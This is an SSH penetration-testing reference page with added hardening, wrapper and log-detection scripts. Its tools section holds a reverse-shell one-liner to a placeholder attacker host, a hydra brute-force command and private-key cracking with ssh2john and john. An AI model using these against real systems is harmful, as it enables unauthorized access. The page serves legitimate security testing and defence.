Notes


Alternative Ports
2222, 8022, etc.

Service Description
SSH (Secure Shell) runs on TCP port 22 and provides encrypted remote administration, tunneling, and file transfer (SCP/SFTP). Commonly used to manage Unix/Linux systems, but also found on network appliances and embedded devices. SSH supports both password and public key authentication.

Don’t brute force SSH without explicit permission.

Excessive login attempts can trigger lockouts, account bans, or alert monitoring systems. A ‘single password’ spray may be acceptable.


Attacks


Weak or Default Credentials
Attackers may brute-force or guess default credentials on exposed devices or newly provisioned systems.

Public Key Trust Misuse
Exposed private keys, reused keypairs, or poorly scoped authorized_keys entries can allow pivoting or privilege escalation.

Outdated or Weak Ciphers
Misconfigured servers may allow deprecated or insecure algorithms (e.g. arcfour, CBC-mode ciphers, or diffie-hellman-group1-sha1).
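
The following is an added example, not from the page: a weak sshd algorithm configuration beside a hardened drop-in, plus a small check that reads sshd_config lines or the output of sshd -T and reports deprecated algorithms. Both config texts are constructed, and the drop-in path is an assumption (OpenSSH 8.2 and later read /etc/ssh/sshd_config.d/*.conf).

```sh
#!/bin/sh
# Added example, not from the page: weak vs. hardened sshd algorithm settings and
# a checker for sshd_config lines or `sshd -T` output. The config texts below are
# constructed; the drop-in path is an assumption (OpenSSH 8.2+ reads
# /etc/ssh/sshd_config.d/*.conf).

# Weak configuration as found on old or misconfigured servers (constructed).
WEAK_CONFIG='Ciphers aes256-cbc,aes128-cbc,arcfour,3des-cbc
KexAlgorithms diffie-hellman-group1-sha1,diffie-hellman-group14-sha1
MACs hmac-md5,hmac-sha1'

# Hardened drop-in, e.g. /etc/ssh/sshd_config.d/99-algorithms.conf; reload sshd after.
HARDENED_CONFIG='Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com'

# grep -E pattern for algorithms that should not be offered: RC4 (arcfour),
# CBC-mode and legacy block ciphers, SHA-1 key exchange, MD5/SHA-1 MACs.
WEAK_PATTERN='arcfour|-cbc|3des|blowfish|cast128|group1-sha1|group14-sha1|group-exchange-sha1|hmac-md5|hmac-sha1'

# check_algos < config
# Accepts "Keyword value" lines in sshd_config syntax or the lowercase form
# printed by `sshd -T`, splits the comma-separated lists and prints one
# "keyword algorithm" line per weak entry. Returns 1 if any were found, else 0.
check_algos() {
    found=0
    while read -r key value; do
        case "$key" in
            [Cc]iphers|[Kk]ex[Aa]lgorithms|[Mm][Aa][Cc]s)
                for algo in $(printf '%s' "$value" | tr ',' ' '); do
                    if printf '%s\n' "$algo" | grep -Eq "$WEAK_PATTERN"; then
                        printf '%s %s\n' "$key" "$algo"
                        found=1
                    fi
                done ;;
        esac
    done
    return "$found"
}

# Number of weak entries in a config text; 0 means clean.
count_weak() {
    printf '%s\n' "$1" | check_algos | wc -l | tr -d ' '
}

# Stand-alone demo on the constructed configs. On a real host run, as root:
#   sshd -T | check_algos
printf '%s\n' "$WEAK_CONFIG" | check_algos || echo "weak algorithms present (listed above)"
printf '%s\n' "$HARDENED_CONFIG" | check_algos && echo "hardened config is clean"
```

Running sshd -T (as root) instead of reading the file is the better check, because it prints the effective values after defaults, Match blocks and drop-ins are applied; ssh-audit from the enumeration section gives the same answer from the client side.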

Command Injection via SSH wrapper scripts
Poorly written authorized_keys command restrictions or SSH wrapper scripts can sometimes be bypassed.
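
A forced-command wrapper that accepts only an exact allow-list, added here as an example (not from the page): the wrapper path, the rsync invocation and the key comment in the authorized_keys line are assumptions. A weak wrapper typically matches a prefix of SSH_ORIGINAL_COMMAND and hands the whole client string to eval or sh -c, which is the kind of restriction the bypasses above target; exact matching plus a fixed argv removes that surface.

```sh
#!/bin/sh
# Added example, not from the page: a forced-command wrapper for a restricted
# SSH key. The wrapper path, the rsync invocation and the key comment are
# assumptions. Install it from authorized_keys, e.g.:
#   command="/usr/local/bin/ssh-wrapper.sh --dispatch",restrict ssh-ed25519 AAAA... backup@host
# "restrict" (OpenSSH 7.2+) disables pty, port/agent/X11 forwarding in one keyword.
#
# A weak wrapper matches a prefix of SSH_ORIGINAL_COMMAND (e.g. "rsync*") and
# passes the whole client string to eval or sh -c, so appended metacharacters
# run too. This one accepts exact strings only and executes a fixed argv.

# allow_command STRING: 0 only for an exact allow-list entry, 1 otherwise.
allow_command() {
    case "$1" in
        "rsync --server --sender . /srv/backup/") return 0 ;;
        "uptime") return 0 ;;
        *) return 1 ;;
    esac
}

# run_allowed STRING: exec the fixed argv for an allowed command; the client
# string itself is never handed to a shell.
run_allowed() {
    case "$1" in
        "rsync --server --sender . /srv/backup/")
            exec /usr/bin/rsync --server --sender . /srv/backup/ ;;
        "uptime")
            exec /usr/bin/uptime ;;
    esac
}

main() {
    cmd="${SSH_ORIGINAL_COMMAND:-}"
    if allow_command "$cmd"; then
        logger -t ssh-wrapper "allowed: $cmd"
        run_allowed "$cmd"
    fi
    # Reached for anything not on the list, including an empty command
    # (interactive login attempt) and exec failures.
    logger -t ssh-wrapper "refused: $cmd"
    printf 'command not permitted\n' >&2
    exit 1
}

# Dispatch only when started by sshd through the authorized_keys command=
# option above (which passes --dispatch); otherwise only the functions are defined.
case "${1:-}" in
    --dispatch) main ;;
esac
```

Every refusal is logged with the offending string, so repeated "refused:" entries for one key are themselves a signal worth alerting on.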


Tools & Exploits


Enumeration


nmap
Standard SSH version and script probe.

nmap -sV -p22 --script ssh2-enum-algos,ssh-hostkey,ssh-auth-methods <target>

ssh-audit
Audits server for weak configurations and algorithms.

ssh-audit <ip>

hydra / medusa / ncrack
Use with care, only when explicitly permitted.

hydra -l root -P passwords.txt ssh://<target>

OpenSSH Client
Manual probing and banner grabbing.

ssh -vvv <user>@<target>

Exploitation or Post-Enum


Exposed SSH Keys
Look for private keys on compromised hosts or in backups.

ssh -i id_rsa user@target

Shell escape via SSH-restricted shell

ssh user@target 'bash -i >& /dev/tcp/attackerip/4444 0>&1'

ssh2john (for cracking private keys)
Extracts hash from SSH private key for use with john.

python3 /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=rockyou.txt id_rsa.hash

Admin Tasks & Usage


Creating a New SSH Key Pair

ssh-keygen -t rsa -b 4096 -f ~/.ssh/mykey

Generates a public/private key pair for authentication. The public key can be appended to ~/.ssh/authorized_keys on the target.

Starting SSH Service (Linux)

sudo systemctl start ssh
sudo systemctl enable ssh

Or, on distributions that use the service command:

sudo service ssh start

Adding a Public Key for Login Access

cat ~/.ssh/mykey.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

Run Commands Remotely

ssh user@remote-host 'command to run'
# Example: grant a user passwordless sudo
ssh user@remote-host "echo 'your-username ALL=(ALL) NOPASSWD:ALL' | sudo tee /etc/sudoers.d/your-username"

Wireshark Analysis Tips


Filters

tcp.port == 22

What to look for:

  • SSH version exchange (first few packets)
  • Key exchange/init
  • Auth method negotiation
  • Signs of brute force (repeated connection attempts)
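
The repeated connection attempts listed above have a host-side counterpart in sshd's auth log. The following is an added example, not from the page, that counts "Failed password" events per source IP over constructed sample log lines and flags sources at or above a threshold; the IPs, hostname, PIDs and fingerprint are made up.

```sh
#!/bin/sh
# Added example, not from the page: flag source IPs with repeated SSH login
# failures in sshd auth log lines. The log lines below are constructed samples
# (RFC 5737 test addresses), not captured data.

SAMPLE_LOG='Mar  3 10:01:02 host sshd[2101]: Failed password for root from 203.0.113.7 port 51022 ssh2
Mar  3 10:01:03 host sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51024 ssh2
Mar  3 10:01:04 host sshd[2105]: Failed password for root from 203.0.113.7 port 51026 ssh2
Mar  3 10:01:05 host sshd[2107]: Failed password for invalid user test from 203.0.113.7 port 51028 ssh2
Mar  3 10:01:06 host sshd[2109]: Failed password for root from 203.0.113.7 port 51030 ssh2
Mar  3 10:02:11 host sshd[2140]: Failed password for alice from 198.51.100.20 port 40010 ssh2
Mar  3 10:02:40 host sshd[2142]: Accepted publickey for alice from 198.51.100.20 port 40012 ssh2: ED25519 SHA256:constructedFingerprint
Mar  3 10:03:00 host sshd[2150]: Failed password for bob from 192.0.2.9 port 33001 ssh2
Mar  3 10:03:01 host sshd[2151]: Failed password for bob from 192.0.2.9 port 33002 ssh2
Mar  3 10:03:02 host sshd[2152]: Failed password for bob from 192.0.2.9 port 33003 ssh2'

# flag_bruteforce THRESHOLD < logfile
# Prints "count ip" for every source IP with at least THRESHOLD failures,
# highest count first. Only "Failed password" lines are counted; successful
# logins and other sshd events are ignored. The address is taken from the
# word after "from", since "invalid user" lines shift the field positions.
flag_bruteforce() {
    threshold="${1:-5}"
    awk -v t="$threshold" '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
        }
        END { for (ip in fails) if (fails[ip] >= t) printf "%d %s\n", fails[ip], ip }
    ' | sort -rn
}

# Run the detector over the constructed sample so the block works stand-alone;
# on a real host use e.g.: flag_bruteforce 10 < /var/log/auth.log
demo() {
    printf '%s\n' "$SAMPLE_LOG" | flag_bruteforce "$1"
}

demo 3
```

A single failure from 198.51.100.20 followed by an accepted public-key login is normal user behaviour and stays below the threshold; the threshold and time window should be tuned to the host, since a password spray against many accounts from one source shows up here while a slow, distributed spray needs correlation across sources.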

References